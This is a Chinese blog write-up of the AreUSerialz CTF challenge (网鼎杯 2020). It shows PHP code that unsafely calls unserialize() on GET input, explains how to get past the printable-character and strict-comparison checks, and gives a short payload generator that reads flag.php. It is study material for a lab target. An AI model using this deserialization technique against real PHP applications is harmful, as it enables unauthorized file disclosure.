审计练习7——[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-06-19 17:26:17 发布
最新推荐文章于 2024-06-19 17:26:17 发布
阅读量370 收藏
点赞数
分类专栏: 代码审计 文章标签: php 字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43756333/article/details/106450754
版权

平台:buuoj.cn
打开靶机即得源码
分析一下

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();//op=1时,执行write()中的file_put_contents
        } else if($this->op == "2") {
            $res = $this->read();//op=2时,执行read()中的file_get_contents
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }//长度过长检测
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";//强类型比较,函数调用结束时op=2调整为1
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;//判断传入的字符串是否为可打印字符
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }//反序列化传入的字符串

}
解题

考点是反序列化漏洞,我们需要将filename=flag.php序列化传入。
首先传入的字符串会经过is_vaild检测,传入的payload均要是可打印字符,但protected类型会加上%00进行标识,%00被url解码后ASCII值为0,不在32-125之间,导致不能通过。
绕过:php7对类的修饰不敏感,直接把属性修饰为public,正常序列化即可
第二部分是函数调用结束后__destruct会自动把op的值改为1
op==="2"类型和数值都必须等于’2’,后调用process又进行op==“2”不检查类型,使用弱类型2 == "2"设置op是数字2进行绕过即可。
构造exp如下:

<?php
class FileHandler{
    public $op;
    public $filename;
    public $content;
}
$payload = new FileHandler();
$payload->op = 2;
$payload->filename = "flag.php";
$payload->content = "whatever";
echo serialize($payload);

源码处得到flag
在这里插入图片描述
buu上应当是改了路径,比赛的flag.php的是要通过cmdline读取它的绝对路径才能得到flag.php的位置。

hui________
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
网鼎杯2020[青龙]--AreUSerialz
Oavinci的博客
06-28 7055
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
BUUCTF [网鼎杯 2020 青龙] AreUSerialz1
最新发布
m0_74167420的博客
06-19 214
(2)对于FileHandler类,由于在反序列化中,先调用__destruct()析构方法,所以需要设计op的值绕过与 "2" 的强相等。(3)所以当op = 2时,一方面利用弱相等,可以调用read()方法和output()方法,另一方面也可以绕过强相等,避免执行在__destruct()时 op 赋值为 1。(1)get传参 "str",string转化为字符串,用 is_valid() 函数来进行过滤,要求传入的字符串的每一位字符的ASCII码都在32~125之间。1、阅读题目:php绕过类型。
[网鼎杯 2020 青龙]AreUSerialz1
陈艺秋的博客
07-05 699
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法。
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 627
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
2020网鼎杯青龙web AreUSerialz详解
永远是少年
12-20 801
今天继续给大家介绍CTF刷题,本文主要内容是2020网鼎杯青龙web AreUSerialz详解。 一、题目简介 二、PHP代码分析 三、解题实战
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz1
weixin_74410605的博客
08-20 364
得到O:11:"FileHandler":3:{s:2:"op";通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。接着ctrl+u查看源码即可得到flag。
[网鼎杯 2020 青龙]AreUSerialz-BUUCTF-XING
chinese_cabbage0的博客
02-01 942
此处为=,弱类型比较,op=="2”,结果为true,op==="2",结果为false。//定义了赋初值,如果在这了把filename设置为flag.php和op设置为2就可以看到flag了,但是后面有个。查看代码可以看出来,GET方式传入序列化的str字符串,str字符串中每一个字符的ASCII范围在32到125之间,然后对其反序列化。//把op=2给赋值成了op=1,所以不行。op==="2",将其赋为"1",同时content赋为空,进入process函数。(===是强类型比较)
[网鼎杯 2020 青龙]AreUSerialz 1
qq_43618536的博客
07-03 488
BUUCTF的[网鼎杯 2020 青龙]AreUSerialz 1
[网鼎杯 2020 青龙]AreUSerialz(超详细)
2201_75955146的博客
10-22 369
一周一更,这是第二周啦,还是一道PHP审计题。学了蛮久了,终于算是懂了一点了。话不多说,直接开始。感觉好难学啊!哎,慢慢来吧,会熬出头的。
2020-网鼎杯-青龙-Web-AreUSerialz
feng的博客
11-03 761
前言 是一道PHP反序列胡的题目,不过那个ASCII的绕过就是我们知识盲区了,还有就是路径的问题,不过我是在CTFHub上做的这个题目,不存在路径的问题。 WP 首先进入环境,进行代码审计: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; functio
[网鼎杯 2020 青龙]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3064
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
BUUCTF [网鼎杯 2020 青龙]AreUSerialz 1 (两种解法 超详细!)
m0_73734159的博客
11-27 1714
*include() ** 包含函数 ** ****is_valid() ** 检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。**file_get_contents() ** 函数把整个文件读入一个字符串中。**file_put_contents() **函数把一个字符串写入文件中。
【web | CTF】BUUCTF [网鼎杯 2020 青龙]AreUSerialz
weixin_46301214的博客
02-17 901
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的。看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行。奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊。天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了。天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境。
青龙面板2.16.7
04-22
青龙面板是一款开源的管理面板,可以帮助用户方便管理服务器和应用程序。青龙面板2.16.7是其最新版本,具有以下特点和功能: 1. 多种操作系统支持:青龙面板支持多种操作系统,包括Linux、Windows等,可以在不同的服务器环境下使用。 2. 简单易用的界面:青龙面板提供了直观友好的用户界面,使用户可以轻松地进行服务器管理和配置。 3. 多种功能模块:青龙面板包含了丰富的功能模块,如网站管理、数据库管理、文件管理、日志查看等,满足了用户对服务器管理的各种需求。 4. 安全性和稳定性:青龙面板采用了安全性和稳定性较高的技术,保证了用户数据的安全和服务器的稳定运行。 5. 插件扩展性:青龙面板支持插件扩展,用户可以根据自己的需求添加自定义功能。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hui________

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值